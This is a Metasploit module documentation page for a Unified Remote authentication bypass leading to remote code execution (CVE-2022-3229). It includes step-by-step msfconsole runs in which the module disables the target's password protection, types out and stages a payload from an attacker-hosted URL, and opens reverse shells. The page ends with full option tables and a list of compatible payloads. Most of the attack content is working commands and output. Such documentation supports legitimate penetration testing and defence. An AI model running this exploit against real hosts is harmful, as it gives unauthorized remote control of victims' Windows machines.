Unified Remote Auth Bypass to RCE - Metasploit
This page contains detailed information about how to use the exploit/windows/misc/unified_remote_rce metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
- Module Overview
- Knowledge Base
- Vulnerable Application
- Verification Steps
- Options
- Scenarios
- Version 3.11.0.2483 on Windows 10, No authentication, visible false
- Version 3.11.0.2483 on Windows 10, No authentication, visible true
- Version 3.11.0.2483 on Windows 10, group authentication, visible true
- Version 3.11.0.2483 on Windows 10, user authentication, visible true
- Version 3.11.0.2483 on Windows 10, no authentication, no web server access, visible true
- Version 3.11.0.2483 on Windows 10, user authentication, no web server access, visible true
- Msfconsole Usage
- Error Messages
- Related Pull Requests
- References
- See Also
- Authors
- Version
Module Overview
Name: Unified Remote Auth Bypass to RCE
Module: exploit/windows/misc/unified_remote_rce
Source code: modules/exploits/windows/misc/unified_remote_rce.rb
Disclosure date: 2021-02-25
Last modification time: 2022-09-26 15:45:42 +0000
Supported architecture(s): x64, x86
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): 9512
List of CVEs: CVE-2022-3229
This module utilizes the Unified Remote remote control protocol to type out and deploy a payload. The remote control protocol can be configured to have no passwords, a group password, or individual user accounts. If the web page is accessible, the access control is set to no password for exploitation, then reverted. If the web page is not accessible, exploitation will be tried blindly. This module has been successfully tested against version 3.11.0.2483 (50) on Windows 10.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Reliability:
- repeatable-session: The module is expected to get a shell every time it runs.
Stability:
- crash-safe: Module should not crash the service.
Side Effects:
- screen-effects: Module may show something on the screen (Example: a window pops up).
- artifacts-on-disk: Modules leaves a payload or a dropper on the target machine.
Basic Usage
msf > use exploit/windows/misc/unified_remote_rce
msf exploit(unified_remote_rce) > exploit
Required Options
- RHOSTS: The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
Knowledge Base
Vulnerable Application
This module utilizes the Unified Remote remote control protocol to type out and deploy a payload. The remote control protocol can be configured to have no passwords, a group password, or individual user accounts. If the web page is accessible, the access control is set to no password for exploitation, then reverted. If the web page is not accessible, exploitation will be tried blindly.
This module has been successfully tested against version 3.11.0.2483 (50) on Windows 10.
Version 3.11.0.2483 can be downloaded from unifiedremote.com
Verification Steps
- Install the application
- Start msfconsole
- Do:
use exploit/windows/misc/unified_remote_rce
- Set
rhost
andlhost
as required. - Do:
run
- You should get a shell.
Options
WEBSERVER
The port the web server is running on. Defaults to 9510
CLIENTNAME
The name of the client device to use. This shows up in the Unified Remote logs. If empty A random android based name is chosen. Defaults to ``
SLEEP
The length of time to sleep between each command, this gives the remote program time to process the command on screen.
Defaults to 1
second.
PATH
This ONLY applies to the pull method. Where to temporarily store the payload. Defaults to c:\\Windows\\Temp\\
VISIBLE
If set to true
, uses a 'standard' method of typing to the screen. If set to false
utilizes a 'pro' feature of unified remote to execute a script in the background.
Defaults to false
Scenarios
Version 3.11.0.2483 on Windows 10, No authentication, visible false
resource (unified.rb)> use exploits/windows/misc/unified_remote_rce
[*] Using configured payload windows/shell/reverse_tcp
resource (unified.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (unified.rb)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (unified.rb)> set verbose true
verbose => true
msf6 exploit(windows/misc/unified_remote_rce) > run
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] 2.2.2.2:9512 - Client name set to: android-ASvxWyO708Rv4x0j
[*] 2.2.2.2:9512 - Retrieving server config
[+] 2.2.2.2:9512 - No security enabled
[+] 2.2.2.2:9512 - Found account: admin
[+] 2.2.2.2:9512 - Found account: wheres
[*] 2.2.2.2:9512 - Sending handshake
[*] 2.2.2.2:9512 - Sending empty authentication
[*] 2.2.2.2:9512 - Using URL: http://1.1.1.1:8080/
[*] 2.2.2.2:9512 - Loading Unified.Command
[*] 2.2.2.2:9512 - Updating Unified.Command
[*] 2.2.2.2:9512 - Sending payload
[*] 2.2.2.2:9512 - Executing script
[+] 2.2.2.2:9512 - Payload request received, sending 73802 bytes of payload for staging
[+] 2.2.2.2:9512 - Payload request received, sending 73802 bytes of payload for staging
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 2.2.2.2
[*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:50052) at 2022-09-18 19:00:33 -0400
[*] 2.2.2.2:9512 - Server stopped.
[!] 2.2.2.2:9512 - This exploit may require manual cleanup of 'c:\Windows\Temp\U4culUYTuG.exe' on the target
Shell Banner:
Microsoft Windows [Version 10.0.16299.125]
-----
C:\ProgramData\Unified Remote\Remotes\Bundled\Unified\Main\Command>
Version 3.11.0.2483 on Windows 10, No authentication, visible true
resource (unified.rb)> use exploits/windows/misc/unified_remote_rce
[*] Using configured payload windows/shell/reverse_tcp
resource (unified.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (unified.rb)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (unified.rb)> set verbose true
verbose => true
msf6 exploit(windows/misc/unified_remote_rce) > exploit
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] 2.2.2.2:9512 - Client name set to: android-s5IbpVuRf1MJzqRs
[*] 2.2.2.2:9512 - Retrieving server config
[+] 2.2.2.2:9512 - No security enabled
[+] 2.2.2.2:9512 - Found account: admin
[+] 2.2.2.2:9512 - Found account: wheres
[*] 2.2.2.2:9512 - Sending handshake
[*] 2.2.2.2:9512 - Sending empty authentication
[*] 2.2.2.2:9512 - Opening Start Menu
[*] 2.2.2.2:9512 - Opening command prompt
[*] 2.2.2.2:9512 - Typing out payload
[*] 2.2.2.2:9512 - Using URL: http://1.1.1.1:8080/
[*] 2.2.2.2:9512 - Attempting to open payload
[+] 2.2.2.2:9512 - Payload request received, sending 73802 bytes of payload for staging
[+] 2.2.2.2:9512 - Payload request received, sending 73802 bytes of payload for staging
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 2.2.2.2
[*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:59233) at 2022-09-08 16:47:20 -0400
[*] 2.2.2.2:9512 - Server stopped.
[!] 2.2.2.2:9512 - This exploit may require manual cleanup of 'c:\Windows\Temp\jhy5cTqRs.exe' on the target
Shell Banner:
Microsoft Windows [Version 10.0.16299.125]
-----
C:\Users\windows>whoami
whoami
win10prolicense\windows
C:\Users\windows>systeminfo
systeminfo
Host Name: WIN10PROLICENSE
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.16299 N/A Build 16299
Version 3.11.0.2483 on Windows 10, group authentication, visible true
resource (unified.rb)> use exploits/windows/misc/unified_remote_rce
[*] Using configured payload windows/shell/reverse_tcp
resource (unified.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (unified.rb)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (unified.rb)> set verbose true
verbose => true
msf6 exploit(windows/misc/unified_remote_rce) > exploit
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] 2.2.2.2:9512 - Client name set to: android-ergZhp49nDBmGXz8
[*] 2.2.2.2:9512 - Retrieving server config
[*] 2.2.2.2:9512 - anonymous mode enabled, password required, bypassing
[*] 2.2.2.2:9512 - Uploading new server config
[*] 2.2.2.2:9512 - Sleeping 5 seconds for server to restart
[+] 2.2.2.2:9512 - Found account: admin
[+] 2.2.2.2:9512 - Found account: wheres
[*] 2.2.2.2:9512 - Sending handshake
[*] 2.2.2.2:9512 - Sending empty authentication
[*] 2.2.2.2:9512 - Opening Start Menu
[*] 2.2.2.2:9512 - Opening command prompt
[*] 2.2.2.2:9512 - Typing out payload
[*] 2.2.2.2:9512 - Using URL: http://1.1.1.1:8080/
[*] 2.2.2.2:9512 - Attempting to open payload
[+] 2.2.2.2:9512 - Payload request received, sending 73802 bytes of payload for staging
[+] 2.2.2.2:9512 - Payload request received, sending 73802 bytes of payload for staging
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 2.2.2.2
[*] 2.2.2.2:9512 - Reverting security mode
[*] 2.2.2.2:9512 - Uploading new server config
[*] 2.2.2.2:9512 - Sleeping 5 seconds for server to restart
[*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:59596) at 2022-09-08 16:50:21 -0400
[*] 2.2.2.2:9512 - Server stopped.
[!] 2.2.2.2:9512 - This exploit may require manual cleanup of 'c:\Windows\Temp\lqVUQTKtxuSD1mm.exe' on the target
Shell Banner:
Microsoft Windows [Version 10.0.16299.125]
-----
C:\Users\windows>
Version 3.11.0.2483 on Windows 10, user authentication, visible true
resource (unified.rb)> use exploits/windows/misc/unified_remote_rce
[*] Using configured payload windows/shell/reverse_tcp
resource (unified.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (unified.rb)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (unified.rb)> set verbose true
verbose => true
msf6 exploit(windows/misc/unified_remote_rce) > exploit
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] 2.2.2.2:9512 - Client name set to: android-Mmw9X2FSLLPzJk6t
[*] 2.2.2.2:9512 - Retrieving server config
[*] 2.2.2.2:9512 - users mode enabled, password required, bypassing
[*] 2.2.2.2:9512 - Uploading new server config
[*] 2.2.2.2:9512 - Sleeping 5 seconds for server to restart
[+] 2.2.2.2:9512 - Found account: admin
[+] 2.2.2.2:9512 - Found account: wheres
[*] 2.2.2.2:9512 - Sending handshake
[*] 2.2.2.2:9512 - Sending empty authentication
[*] 2.2.2.2:9512 - Opening Start Menu
[*] 2.2.2.2:9512 - Opening command prompt
[*] 2.2.2.2:9512 - Typing out payload
[*] 2.2.2.2:9512 - Using URL: http://1.1.1.1:8080/
[*] 2.2.2.2:9512 - Attempting to open payload
[+] 2.2.2.2:9512 - Payload request received, sending 73802 bytes of payload for staging
[+] 2.2.2.2:9512 - Payload request received, sending 73802 bytes of payload for staging
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 2.2.2.2
[*] 2.2.2.2:9512 - Reverting security mode
[*] 2.2.2.2:9512 - Uploading new server config
[*] 2.2.2.2:9512 - Sleeping 5 seconds for server to restart
[*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:59932) at 2022-09-08 16:53:05 -0400
[*] 2.2.2.2:9512 - Server stopped.
[!] 2.2.2.2:9512 - This exploit may require manual cleanup of 'c:\Windows\Temp\2NzuxPbY6fGK9FdNy.exe' on the target
Shell Banner:
Microsoft Windows [Version 10.0.16299.125]
-----
C:\Users\windows>
Version 3.11.0.2483 on Windows 10, no authentication, no web server access, visible true
resource (unified.rb)> use exploits/windows/misc/unified_remote_rce
[*] Using configured payload windows/shell/reverse_tcp
resource (unified.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (unified.rb)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (unified.rb)> set verbose true
verbose => true
msf6 exploit(windows/misc/unified_remote_rce) > exploit
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] 2.2.2.2:9512 - Client name set to: android-EIC1Bc3pwL4U4Pnj
[*] 2.2.2.2:9512 - Retrieving server config
[-] 2.2.2.2:9512 - Web interface is disabled. Unable to attempt bypass, assuming no authentication.
[*] 2.2.2.2:9512 - Sending handshake
[*] 2.2.2.2:9512 - Sending empty authentication
[*] 2.2.2.2:9512 - Opening Start Menu
[*] 2.2.2.2:9512 - Opening command prompt
[*] 2.2.2.2:9512 - Typing out payload
[*] 2.2.2.2:9512 - Using URL: http://1.1.1.1:8080/
[*] 2.2.2.2:9512 - Attempting to open payload
[+] 2.2.2.2:9512 - Payload request received, sending 73802 bytes of payload for staging
[+] 2.2.2.2:9512 - Payload request received, sending 73802 bytes of payload for staging
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 2.2.2.2
[*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:60829) at 2022-09-08 17:00:30 -0400
[*] 2.2.2.2:9512 - Server stopped.
[!] 2.2.2.2:9512 - This exploit may require manual cleanup of 'c:\Windows\Temp\QD7V9rLaWUwvPIY.exe' on the target
Shell Banner:
Microsoft Windows [Version 10.0.16299.125]
-----
C:\Users\windows>
Version 3.11.0.2483 on Windows 10, user authentication, no web server access, visible true
This will fail.
resource (unified.rb)> use exploits/windows/misc/unified_remote_rce
[*] Using configured payload windows/shell/reverse_tcp
resource (unified.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (unified.rb)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (unified.rb)> set verbose true
verbose => true
msf6 exploit(windows/misc/unified_remote_rce) > exploit
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] 2.2.2.2:9512 - Client name set to: android-iJP3rW13dKjtf8Xz
[*] 2.2.2.2:9512 - Retrieving server config
[-] 2.2.2.2:9512 - Web interface is disabled. Unable to attempt bypass, assuming no authentication.
[*] 2.2.2.2:9512 - Sending handshake
[*] 2.2.2.2:9512 - Sending empty authentication
[*] 2.2.2.2:9512 - Opening Start Menu
[*] 2.2.2.2:9512 - Opening command prompt
[*] 2.2.2.2:9512 - Typing out payload
[*] 2.2.2.2:9512 - Using URL: http://1.1.1.1:8080/
[*] 2.2.2.2:9512 - Attempting to open payload
[*] 2.2.2.2:9512 - Server stopped.
[!] 2.2.2.2:9512 - This exploit may require manual cleanup of 'c:\Windows\Temp\tapEZnGskY.exe' on the target
[*] Exploit completed, but no session was created.
Go back to menu.
Msfconsole Usage
Here is how the windows/misc/unified_remote_rce exploit module looks in the msfconsole:
msf6 > use exploit/windows/misc/unified_remote_rce
[*] Using configured payload windows/shell/reverse_tcp
msf6 exploit(windows/misc/unified_remote_rce) > show info
Name: Unified Remote Auth Bypass to RCE
Module: exploit/windows/misc/unified_remote_rce
Platform: Windows
Arch: x64, x86
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2021-02-25
Provided by:
h00die
H4RK3NZ0
Module side effects:
screen-effects
artifacts-on-disk
Module stability:
crash-safe
Module reliability:
repeatable-session
Available targets:
Id Name
-- ----
0 pull
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
CLIENTNAME no Name of client, this shows up in the logs
PATH c:\Windows\Temp\ yes Where to stage payload for pull method
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 9512 yes Port Unified Remote runs on (TCP)
SLEEP 1 yes How long to sleep between commands
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0
.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
VISIBLE false no Make exploitation visible to the user
WEBSERVER 9510 yes Port Unified Remote web server runs on
Payload information:
Avoid: 2 characters
Description:
This module utilizes the Unified Remote remote control protocol to
type out and deploy a payload. The remote control protocol can be
configured to have no passwords, a group password, or individual
user accounts. If the web page is accessible, the access control is
set to no password for exploitation, then reverted. If the web page
is not accessible, exploitation will be tried blindly. This module
has been successfully tested against version 3.11.0.2483 (50) on
Windows 10.
References:
https://www.exploit-db.com/exploits/49587
https://www.unifiedremote.com/
https://github.com/H4rk3nz0/PenTesting/blob/main/Exploits/unified%20remote/unified-remote-rce.py
https://nvd.nist.gov/vuln/detail/CVE-2022-3229
Module Options
This is a complete list of options available in the windows/misc/unified_remote_rce exploit:
msf6 exploit(windows/misc/unified_remote_rce) > show options
Module options (exploit/windows/misc/unified_remote_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
CLIENTNAME no Name of client, this shows up in the logs
PATH c:\Windows\Temp\ yes Where to stage payload for pull method
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 9512 yes Port Unified Remote runs on (TCP)
SLEEP 1 yes How long to sleep between commands
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.
0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
VISIBLE false no Make exploitation visible to the user
WEBSERVER 9510 yes Port Unified Remote web server runs on
Payload options (windows/shell/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 pull
Advanced Options
Here is a complete list of advanced options supported by the windows/misc/unified_remote_rce exploit:
msf6 exploit(windows/misc/unified_remote_rce) > show advanced
Module advanced options (exploit/windows/misc/unified_remote_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
AllowNoCleanup false no Allow exploitation without the possibility of cleaning up files
CHOST no The local client address
CPORT no The local client port
ConnectTimeout 10 yes Maximum number of seconds to establish a TCP connection
ContextInformationFile no The information file that contains context information
DisablePayloadHandler false no Disable the handler code for the selected payload
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableContextEncoding false no Use transient context when encoding payloads
FileDropperDelay no Delay in seconds before attempting cleanup
ListenerBindAddress no The specific IP address to bind to if different from SRVHOST
ListenerBindPort no The port to bind to if different from SRVPORT
ListenerComm no The specific communication channel to use for this service
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
SSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
SSLCompression false no Enable SSL/TLS-level compression
SSLServerNameIndication no SSL/TLS Server Name Indication (SNI)
SSLVerifyMode PEER no SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accept
ed: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
SendRobots false no Return a robots.txt file if asked for one
URIHOST no Host to use in URI (useful for tunnels)
URIPORT no Port to use in URI (useful for tunnels)
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
WfsDelay 2 no Additional delay in seconds to wait for a session
Payload advanced options (windows/shell/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
CreateSession true no Create a new session for every successful login
EnableStageEncoding false no Encode the second stage payload
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
PayloadBindPort no Port to bind reverse tcp socket to on target system.
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
PrependMigrate false yes Spawns and runs shellcode in new process
PrependMigrateProc no Process to spawn and run shellcode in
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy b
ut directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Exploit Targets
Here is a list of targets (platforms and systems) which the windows/misc/unified_remote_rce module can exploit:
msf6 exploit(windows/misc/unified_remote_rce) > show targets
Exploit targets:
Id Name
-- ----
0 pull
Compatible Payloads
This is a list of possible payloads which can be delivered and executed on the target system using the windows/misc/unified_remote_rce exploit:
msf6 exploit(windows/misc/unified_remote_rce) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/generic/custom normal No Custom Payload
1 payload/generic/debug_trap normal No Generic x86 Debug Trap
2 payload/generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
3 payload/generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
4 payload/generic/ssh/interact normal No Interact with Established SSH Connection
5 payload/generic/tight_loop normal No Generic x86 Tight Loop
6 payload/windows/custom/bind_hidden_ipknock_tcp normal No Windows shellcode stage, Hidden Bind Ipknock TCP Stager
7 payload/windows/custom/bind_hidden_tcp normal No Windows shellcode stage, Hidden Bind TCP Stager
8 payload/windows/custom/bind_ipv6_tcp normal No Windows shellcode stage, Bind IPv6 TCP Stager (Windows x86)
9 payload/windows/custom/bind_ipv6_tcp_uuid normal No Windows shellcode stage, Bind IPv6 TCP Stager with UUID Support (Windows x86)
10 payload/windows/custom/bind_named_pipe normal No Windows shellcode stage, Windows x86 Bind Named Pipe Stager
11 payload/windows/custom/bind_nonx_tcp normal No Windows shellcode stage, Bind TCP Stager (No NX or Win7)
12 payload/windows/custom/bind_tcp normal No Windows shellcode stage, Bind TCP Stager (Windows x86)
13 payload/windows/custom/bind_tcp_rc4 normal No Windows shellcode stage, Bind TCP Stager (RC4 Stage Encryption, Metasm)
14 payload/windows/custom/bind_tcp_uuid normal No Windows shellcode stage, Bind TCP Stager with UUID Support (Windows x86)
15 payload/windows/custom/reverse_hop_http normal No Windows shellcode stage, Reverse Hop HTTP/HTTPS Stager
16 payload/windows/custom/reverse_http normal No Windows shellcode stage, Windows Reverse HTTP Stager (wininet)
17 payload/windows/custom/reverse_http_proxy_pstore normal No Windows shellcode stage, Reverse HTTP Stager Proxy
18 payload/windows/custom/reverse_https normal No Windows shellcode stage, Windows Reverse HTTPS Stager (wininet)
19 payload/windows/custom/reverse_https_proxy normal No Windows shellcode stage, Reverse HTTPS Stager with Support for Custom Proxy
20 payload/windows/custom/reverse_ipv6_tcp normal No Windows shellcode stage, Reverse TCP Stager (IPv6)
21 payload/windows/custom/reverse_named_pipe normal No Windows shellcode stage, Windows x86 Reverse Named Pipe (SMB) Stager
22 payload/windows/custom/reverse_nonx_tcp normal No Windows shellcode stage, Reverse TCP Stager (No NX or Win7)
23 payload/windows/custom/reverse_ord_tcp normal No Windows shellcode stage, Reverse Ordinal TCP Stager (No NX or Win7)
24 payload/windows/custom/reverse_tcp normal No Windows shellcode stage, Reverse TCP Stager
25 payload/windows/custom/reverse_tcp_allports normal No Windows shellcode stage, Reverse All-Port TCP Stager
26 payload/windows/custom/reverse_tcp_dns normal No Windows shellcode stage, Reverse TCP Stager (DNS)
27 payload/windows/custom/reverse_tcp_rc4 normal No Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
28 payload/windows/custom/reverse_tcp_rc4_dns normal No Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
29 payload/windows/custom/reverse_tcp_uuid normal No Windows shellcode stage, Reverse TCP Stager with UUID Support
30 payload/windows/custom/reverse_udp normal No Windows shellcode stage, Reverse UDP Stager with UUID Support
31 payload/windows/custom/reverse_winhttp normal No Windows shellcode stage, Windows Reverse HTTP Stager (winhttp)
32 payload/windows/custom/reverse_winhttps normal No Windows shellcode stage, Windows Reverse HTTPS Stager (winhttp)
33 payload/windows/dllinject/bind_hidden_ipknock_tcp normal No Reflective DLL Injection, Hidden Bind Ipknock TCP Stager
34 payload/windows/dllinject/bind_hidden_tcp normal No Reflective DLL Injection, Hidden Bind TCP Stager
35 payload/windows/dllinject/bind_ipv6_tcp normal No Reflective DLL Injection, Bind IPv6 TCP Stager (Windows x86)
36 payload/windows/dllinject/bind_ipv6_tcp_uuid normal No Reflective DLL Injection, Bind IPv6 TCP Stager with UUID Support (Windows x86)
37 payload/windows/dllinject/bind_named_pipe normal No Reflective DLL Injection, Windows x86 Bind Named Pipe Stager
38 payload/windows/dllinject/bind_nonx_tcp normal No Reflective DLL Injection, Bind TCP Stager (No NX or Win7)
39 payload/windows/dllinject/bind_tcp normal No Reflective DLL Injection, Bind TCP Stager (Windows x86)
40 payload/windows/dllinject/bind_tcp_rc4 normal No Reflective DLL Injection, Bind TCP Stager (RC4 Stage Encryption, Metasm)
41 payload/windows/dllinject/bind_tcp_uuid normal No Reflective DLL Injection, Bind TCP Stager with UUID Support (Windows x86)
42 payload/windows/dllinject/reverse_hop_http normal No Reflective DLL Injection, Reverse Hop HTTP/HTTPS Stager
43 payload/windows/dllinject/reverse_http normal No Reflective DLL Injection, Windows Reverse HTTP Stager (wininet)
44 payload/windows/dllinject/reverse_http_proxy_pstore normal No Reflective DLL Injection, Reverse HTTP Stager Proxy
45 payload/windows/dllinject/reverse_ipv6_tcp normal No Reflective DLL Injection, Reverse TCP Stager (IPv6)
46 payload/windows/dllinject/reverse_nonx_tcp normal No Reflective DLL Injection, Reverse TCP Stager (No NX or Win7)
47 payload/windows/dllinject/reverse_ord_tcp normal No Reflective DLL Injection, Reverse Ordinal TCP Stager (No NX or Win7)
48 payload/windows/dllinject/reverse_tcp normal No Reflective DLL Injection, Reverse TCP Stager
49 payload/windows/dllinject/reverse_tcp_allports normal No Reflective DLL Injection, Reverse All-Port TCP Stager
50 payload/windows/dllinject/reverse_tcp_dns normal No Reflective DLL Injection, Reverse TCP Stager (DNS)
51 payload/windows/dllinject/reverse_tcp_rc4 normal No Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
52 payload/windows/dllinject/reverse_tcp_rc4_dns normal No Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
53 payload/windows/dllinject/reverse_tcp_uuid normal No Reflective DLL Injection, Reverse TCP Stager with UUID Support
54 payload/windows/dllinject/reverse_winhttp normal No Reflective DLL Injection, Windows Reverse HTTP Stager (winhttp)
55 payload/windows/dns_txt_query_exec normal No DNS TXT Record Payload Download and Execution
56 payload/windows/download_exec normal No Windows Executable Download (http,https,ftp) and Execute
57 payload/windows/exec normal No Windows Execute Command
58 payload/windows/loadlibrary normal No Windows LoadLibrary Path
59 payload/windows/messagebox normal No Windows MessageBox
60 payload/windows/meterpreter/bind_hidden_ipknock_tcp normal No Windows Meterpreter (Reflective Injection), Hidden Bind Ipknock TCP Stager
61 payload/windows/meterpreter/bind_hidden_tcp normal No Windows Meterpreter (Reflective Injection), Hidden Bind TCP Stager
62 payload/windows/meterpreter/bind_ipv6_tcp normal No Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)
63 payload/windows/meterpreter/bind_ipv6_tcp_uuid normal No Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
64 payload/windows/meterpreter/bind_named_pipe normal No Windows Meterpreter (Reflective Injection), Windows x86 Bind Named Pipe Stager
65 payload/windows/meterpreter/bind_nonx_tcp normal No Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)
66 payload/windows/meterpreter/bind_tcp normal No Windows Meterpreter (Reflective Injection), Bind TCP Stager (Windows x86)
67 payload/windows/meterpreter/bind_tcp_rc4 normal No Windows Meterpreter (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
68 payload/windows/meterpreter/bind_tcp_uuid normal No Windows Meterpreter (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)
69 payload/windows/meterpreter/reverse_hop_http normal No Windows Meterpreter (Reflective Injection), Reverse Hop HTTP/HTTPS Stager
70 payload/windows/meterpreter/reverse_http normal No Windows Meterpreter (Reflective Injection), Windows Reverse HTTP Stager (wininet)
71 payload/windows/meterpreter/reverse_http_proxy_pstore normal No Windows Meterpreter (Reflective Injection), Reverse HTTP Stager Proxy
72 payload/windows/meterpreter/reverse_https normal No Windows Meterpreter (Reflective Injection), Windows Reverse HTTPS Stager (wininet)
73 payload/windows/meterpreter/reverse_https_proxy normal No Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager with Support for Custom Proxy
74 payload/windows/meterpreter/reverse_ipv6_tcp normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)
75 payload/windows/meterpreter/reverse_named_pipe normal No Windows Meterpreter (Reflective Injection), Windows x86 Reverse Named Pipe (SMB) Stager
76 payload/windows/meterpreter/reverse_nonx_tcp normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)
77 payload/windows/meterpreter/reverse_ord_tcp normal No Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
78 payload/windows/meterpreter/reverse_tcp normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager
79 payload/windows/meterpreter/reverse_tcp_allports normal No Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
80 payload/windows/meterpreter/reverse_tcp_dns normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)
